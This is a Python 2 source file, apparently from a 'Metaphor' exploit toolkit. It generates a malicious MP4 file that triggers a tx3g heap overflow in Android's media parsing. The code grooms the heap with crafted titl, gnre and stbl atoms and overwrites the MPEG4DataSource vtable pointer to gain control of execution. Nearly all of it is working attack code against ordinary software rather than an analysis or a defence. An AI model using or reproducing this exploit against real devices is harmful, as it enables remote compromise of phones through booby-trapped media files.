﻿#!/usr/bin/python2
# -*- coding: utf-8 -*-

from metaphor_tools import *
from metaphor_base import *

TX3G_HEADER_SIZE = 8

class MetaphorSuicide(MetaphorBase):
    DEFAULT_CONFIG = \
    {
        # Heap shaping configuration
        'readAt_offset': 0x1c,
        'fill_size': 0x20,
        'groom_count': 0x50,
    }

    def __init__(self, config):
        self.config = config

    def tx3g_data(self):
        vtable_offset = self.config['readAt_offset']

        # Fill "legit"-size tx3g buffer
        overflow_size = self.config['fill_size'] - TX3G_HEADER_SIZE
        tx3g_data = pad(overflow_size)
        
        # Overflow data - override MPEG4DataSource vtable pointer
        tx3g_data += p32(0x1337 - vtable_offset)

        tx3g = chunk('tx3g', tx3g_data)

        return tx3g

    def evil_trak(self):
        data = ''

        # Prepare ROP data
        tx3g_legit = self.tx3g_data()
        data += tx3g_legit

        # Free placeholder #2
        data += alloc_titl(self.config['fill_size'] * 4)
        
        # Allocate MPEG4DataSource
        data += alloc_stbl()
        
        # Free placeholder #1
        data += alloc_gnre(self.config['fill_size'] * 4)

        data += self.tx3g_trigger(len(tx3g_legit), self.config['fill_size'])

        trak = chunk('trak', data)

        return trak

    def exploit_mp4(self):
        data = ''
        
        # File type header
        ftyp = valid_ftyp()
        data += ftyp

        # Add a valid trak
        data += valid_moov() #+ valid_trak(valid_mdhd())

        # Heap shaping by filling holes
        shape = self.heap_shape()
        data += shape

        # Allocate adjacent placeholders for tx3g buffer and MPEG4DataSource
        data += alloc_titl(self.config['fill_size'])
        data += alloc_gnre(self.config['fill_size'])
        
        # Evil track that exploits the tx3g vulnerability
        trak = self.evil_trak()
        data += trak

        return data
